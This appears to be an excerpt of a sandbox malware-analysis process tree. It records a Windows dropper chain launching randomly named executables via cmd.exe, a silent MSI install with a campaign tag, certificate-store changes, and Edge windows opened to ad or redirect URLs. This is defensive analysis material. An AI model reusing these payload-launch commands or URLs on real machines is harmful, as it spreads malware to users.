                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,10544199790387950101,3969297091349692372,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3216 /prefetch:1
                                                                          10⤵
                                                                          • Executes dropped EXE
                                                                          • Suspicious use of SetThreadContext
                                                                          PID:6544
                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,10544199790387950101,3969297091349692372,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4764 /prefetch:1
                                                                          10⤵
                                                                            PID:5676
                                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,10544199790387950101,3969297091349692372,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4372 /prefetch:1
                                                                            10⤵
                                                                              PID:1152
                                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,10544199790387950101,3969297091349692372,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4828 /prefetch:1
                                                                              10⤵
                                                                                PID:1588
                                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe
                                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2168,10544199790387950101,3969297091349692372,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5732 /prefetch:8
                                                                                10⤵
                                                                                  PID:6340
                                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe
                                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2168,10544199790387950101,3969297091349692372,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5732 /prefetch:8
                                                                                  10⤵
                                                                                    PID:4648
                                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,10544199790387950101,3969297091349692372,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4360 /prefetch:1
                                                                                    10⤵
                                                                                      PID:6644
                                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2168,10544199790387950101,3969297091349692372,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=5184 /prefetch:2
                                                                                      10⤵
                                                                                        PID:5232
                                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2168,10544199790387950101,3969297091349692372,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5332 /prefetch:8
                                                                                        10⤵
                                                                                          PID:6548
                                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2168,10544199790387950101,3969297091349692372,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4832 /prefetch:8
                                                                                          10⤵
                                                                                            PID:6268
                                                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,10544199790387950101,3969297091349692372,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5812 /prefetch:1
                                                                                            10⤵
                                                                                              PID:2964
                                                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,10544199790387950101,3969297091349692372,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4452 /prefetch:1
                                                                                              10⤵
                                                                                                PID:4416
                                                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2168,10544199790387950101,3969297091349692372,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5268 /prefetch:8
                                                                                                10⤵
                                                                                                  PID:2612
                                                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2168,10544199790387950101,3969297091349692372,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4732 /prefetch:8
                                                                                                  10⤵
                                                                                                    PID:5756
                                                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2168,10544199790387950101,3969297091349692372,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1964 /prefetch:8
                                                                                                    10⤵
                                                                                                      PID:4508
                                                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2168,10544199790387950101,3969297091349692372,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5892 /prefetch:8
                                                                                                      10⤵
                                                                                                        PID:5920
                                                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,10544199790387950101,3969297091349692372,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6104 /prefetch:1
                                                                                                        10⤵
                                                                                                          PID:2508
                                                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,10544199790387950101,3969297091349692372,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5168 /prefetch:1
                                                                                                          10⤵
                                                                                                            PID:6416
                                                                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --field-trial-handle=2168,10544199790387950101,3969297091349692372,131072 --lang=en-US --service-sandbox-type=entity_extraction --mojo-platform-channel-handle=5388 /prefetch:8
                                                                                                            10⤵
                                                                                                              PID:5576
                                                                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,10544199790387950101,3969297091349692372,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6028 /prefetch:1
                                                                                                              10⤵
                                                                                                                PID:2140
                                                                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,10544199790387950101,3969297091349692372,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3724 /prefetch:1
                                                                                                                10⤵
                                                                                                                  PID:4340
                                                                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,10544199790387950101,3969297091349692372,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=27 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3448 /prefetch:1
                                                                                                                  10⤵
                                                                                                                    PID:3964
                                                                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,10544199790387950101,3969297091349692372,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=29 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4688 /prefetch:1
                                                                                                                    10⤵
                                                                                                                      PID:5552
                                                                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,10544199790387950101,3969297091349692372,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=31 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5996 /prefetch:1
                                                                                                                      10⤵
                                                                                                                        PID:3172
                                                                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,10544199790387950101,3969297091349692372,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=32 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3364 /prefetch:1
                                                                                                                        10⤵
                                                                                                                          PID:3560
                                                                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/b1fsmdd9m?key=7e872dab99d78bffc4aa0c1e6b062dad
                                                                                                                        9⤵
                                                                                                                          PID:2072
                                                                                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffd3a0e46f8,0x7ffd3a0e4708,0x7ffd3a0e4718
                                                                                                                            10⤵
                                                                                                                              PID:2212
                                                                                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=1851483
                                                                                                                            9⤵
                                                                                                                              PID:1048
                                                                                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffd3a0e46f8,0x7ffd3a0e4708,0x7ffd3a0e4718
                                                                                                                                10⤵
                                                                                                                                  PID:5956
                                                                                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=1851513
                                                                                                                                9⤵
                                                                                                                                  PID:5052
                                                                                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffd3a0e46f8,0x7ffd3a0e4708,0x7ffd3a0e4718
                                                                                                                                    10⤵
                                                                                                                                      PID:5548
                                                                                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://www.directdexchange.com/jump/next.php?r=2087215
                                                                                                                                    9⤵
                                                                                                                                      PID:1248
                                                                                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffd3a0e46f8,0x7ffd3a0e4708,0x7ffd3a0e4718
                                                                                                                                        10⤵
                                                                                                                                          PID:5064
                                                                                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.directdexchange.com/jump/next.php?r=4263119
                                                                                                                                        9⤵
                                                                                                                                          PID:5904
                                                                                                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffd3a0e46f8,0x7ffd3a0e4708,0x7ffd3a0e4718
                                                                                                                                            10⤵
                                                                                                                                              PID:3380
                                                                                                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?id=1294231
                                                                                                                                            9⤵
                                                                                                                                              PID:3332
                                                                                                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffd3a0e46f8,0x7ffd3a0e4708,0x7ffd3a0e4718
                                                                                                                                                10⤵
                                                                                                                                                  PID:3580
                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\bd-e50a1-916-e4b84-ce0dc371e9f41\Rywoponera.exe
                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\bd-e50a1-916-e4b84-ce0dc371e9f41\Rywoponera.exe"
                                                                                                                                              8⤵
                                                                                                                                                PID:6976
                                                                                                                                                • C:\Windows\System32\cmd.exe
                                                                                                                                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\4lm2hkrb.osa\GcleanerEU.exe /eufive & exit
                                                                                                                                                  9⤵
                                                                                                                                                    PID:4264
                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\4lm2hkrb.osa\GcleanerEU.exe
                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\4lm2hkrb.osa\GcleanerEU.exe /eufive
                                                                                                                                                      10⤵
                                                                                                                                                        PID:580
                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 580 -s 256
                                                                                                                                                          11⤵
                                                                                                                                                          • Program crash
                                                                                                                                                          • Checks processor information in registry
                                                                                                                                                          • Enumerates system info in registry
                                                                                                                                                          PID:2948
                                                                                                                                                    • C:\Windows\System32\cmd.exe
                                                                                                                                                      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\1djjnitf.qik\installer.exe /qn CAMPAIGN="654" & exit
                                                                                                                                                      9⤵
                                                                                                                                                        PID:6724
                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\1djjnitf.qik\installer.exe
                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\1djjnitf.qik\installer.exe /qn CAMPAIGN="654"
                                                                                                                                                          10⤵
                                                                                                                                                          • Loads dropped DLL
                                                                                                                                                          • Enumerates connected drives
                                                                                                                                                          • Modifies system certificate store
                                                                                                                                                          • Suspicious use of FindShellTrayWindow
                                                                                                                                                          PID:3888
                                                                                                                                                          • C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                            "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=654 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\1djjnitf.qik\installer.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\1djjnitf.qik\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1632045314 /qn CAMPAIGN=""654"" " CAMPAIGN="654"
                                                                                                                                                            11⤵
                                                                                                                                                            • Enumerates connected drives
                                                                                                                                                            PID:2008
                                                                                                                                                      • C:\Windows\System32\cmd.exe
                                                                                                                                                        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ygt3vomj.h1t\anyname.exe & exit
                                                                                                                                                        9⤵
                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                        PID:6268
                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\ygt3vomj.h1t\anyname.exe
                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\ygt3vomj.h1t\anyname.exe
                                                                                                                                                          10⤵
                                                                                                                                                            PID:2528
                                                                                                                                                        • C:\Windows\System32\cmd.exe
                                                                                                                                                          "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\gkdmtamj.xkt\gcleaner.exe /mixfive & exit
                                                                                                                                                          9⤵
                                                                                                                                                            PID:6416
                                                                                                                                                            • C:\Windows\System32\Conhost.exe
                                                                                                                                                              \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                              10⤵
                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                              • Drops file in Program Files directory
                                                                                                                                                              PID:6584
                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\gkdmtamj.xkt\gcleaner.exe
                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\gkdmtamj.xkt\gcleaner.exe /mixfive
                                                                                                                                                              10⤵
                                                                                                                                                                PID:4680
                                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 4680 -s 256
                                                                                                                                                                  11⤵
                                                                                                                                                                  • Program crash
                                                                                                                                                                  • Checks processor information in registry
                                                                                                                                                                  • Enumerates system info in registry
                                                                                                                                                                  PID:5656
                                                                                                                                                            • C:\Windows\System32\cmd.exe
                                                                                                                                                              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\kbhmedn3.5ps\autosubplayer.exe /S & exit
                                                                                                                                                              9⤵
                                                                                                                                                              • Suspicious use of SetWindowsHookEx
                                                                                                                                                              PID:5596
                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                    C:\Windows\system32\cmd.exe /c Sun06b8d4aadadbfe71.exe
                                                                                                                                                    4⤵
                                                                                                                                                      PID:3692
                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zSCB8B51F0\Sun06b8d4aadadbfe71.exe
                                                                                                                                                        Sun06b8d4aadadbfe71.exe
                                                                                                                                                        5⤵
                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                        • Modifies system certificate store
                                                                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                        PID:5644
                                                                                                                                                        • C:\Users\Admin\Documents\y0uKcCLjVzLMRxs2oGTb_Sow.exe
                                                                                                                                                          "C:\Users\Admin\Documents\y0uKcCLjVzLMRxs2oGTb_Sow.exe"
                                                                                                                                                          6⤵
                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                          PID:5268
                                                                                                                                                        • C:\Users\Admin\Documents\_kX2TF0Z9Hd_puzy_20FU55D.exe
                                                                                                                                                          "C:\Users\Admin\Documents\_kX2TF0Z9Hd_puzy_20FU55D.exe"
                                                                                                                                                          6⤵
                                                                                                                                                            PID:6268
                                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 6268 -s 236
                                                                                                                                                              7⤵
                                                                                                                                                              • Program crash
                                                                                                                                                              • Checks processor information in registry
                                                                                                                                                              • Enumerates system info in registry
                                                                                                                                                              PID:4664
                                                                                                                                                          • C:\Users\Admin\Documents\Z9xzwPyfrmQXcW2fm9RMU_dq.exe
                                                                                                                                                            "C:\Users\Admin\Documents\Z9xzwPyfrmQXcW2fm9RMU_dq.exe"
                                                                                                                                                            6⤵
                                                                                                                                                              PID:6256
                                                                                                                                                            • C:\Users\Admin\Documents\WSVTHHKH6hRSwiYSiACfVpAr.exe
                                                                                                                                                              "C:\Users\Admin\Documents\WSVTHHKH6hRSwiYSiACfVpAr.exe"
                                                                                                                                                              6⤵
                                                                                                                                                                PID:6244
                                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 6244 -s 240
                                                                                                                                                                  7⤵
                                                                                                                                                                  • Program crash
                                                                                                                                                                  • Checks processor information in registry
                                                                                                                                                                  • Enumerates system info in registry
                                                                                                                                                                  PID:1264
                                                                                                                                                              • C:\Users\Admin\Documents\kes0IX2N2M9tgaxE5KoL8ISp.exe
                                                                                                                                                                "C:\Users\Admin\Documents\kes0IX2N2M9tgaxE5KoL8ISp.exe"
                                                                                                                                                                6⤵
                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                • Suspicious use of SetThreadContext
                                                                                                                                                                PID:6228
                                                                                                                                                                • C:\Users\Admin\Documents\kes0IX2N2M9tgaxE5KoL8ISp.exe
                                                                                                                                                                  C:\Users\Admin\Documents\kes0IX2N2M9tgaxE5KoL8ISp.exe
                                                                                                                                                                  7⤵
                                                                                                                                                                    PID:6820
                                                                                                                                                                • C:\Users\Admin\Documents\QfGxxuwTjEbKKJ6qlGOmRFLc.exe
                                                                                                                                                                  "C:\Users\Admin\Documents\QfGxxuwTjEbKKJ6qlGOmRFLc.exe"
                                                                                                                                                                  6⤵
                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                  • Drops file in Program Files directory
                                                                                                                                                                  PID:6344
                                                                                                                                                                  • C:\Program Files (x86)\Company\NewProduct\cm3.exe
                                                                                                                                                                    "C:\Program Files (x86)\Company\NewProduct\cm3.exe"
                                                                                                                                                                    7⤵
                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                    PID:2564
                                                                                                                                                                  • C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe
                                                                                                                                                                    "C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"
                                                                                                                                                                    7⤵
                                                                                                                                                                    • Checks whether UAC is enabled
                                                                                                                                                                    • Drops file in Program Files directory
                                                                                                                                                                    PID:6404
                                                                                                                                                                  • C:\Program Files (x86)\Company\NewProduct\inst001.exe
                                                                                                                                                                    "C:\Program Files (x86)\Company\NewProduct\inst001.exe"
                                                                                                                                                                    7⤵
                                                                                                                                                                      PID:5704
                                                                                                                                                                  • C:\Users\Admin\Documents\o5FFeThTOPSc4talKqiTPyhE.exe
                                                                                                                                                                    "C:\Users\Admin\Documents\o5FFeThTOPSc4talKqiTPyhE.exe"
                                                                                                                                                                    6⤵
                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                    • Checks BIOS information in registry
                                                                                                                                                                    • Checks whether UAC is enabled
                                                                                                                                                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                    PID:6604
                                                                                                                                                                  • C:\Users\Admin\Documents\fnVtl0e9WLt5RKEp7SS8aTLq.exe
                                                                                                                                                                    "C:\Users\Admin\Documents\fnVtl0e9WLt5RKEp7SS8aTLq.exe"
                                                                                                                                                                    6⤵
                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                    PID:6596
                                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 6596 -s 240
                                                                                                                                                                      7⤵
                                                                                                                                                                      • Program crash
                                                                                                                                                                      • Checks processor information in registry
                                                                                                                                                                      • Enumerates system info in registry
                                                                                                                                                                      PID:7100
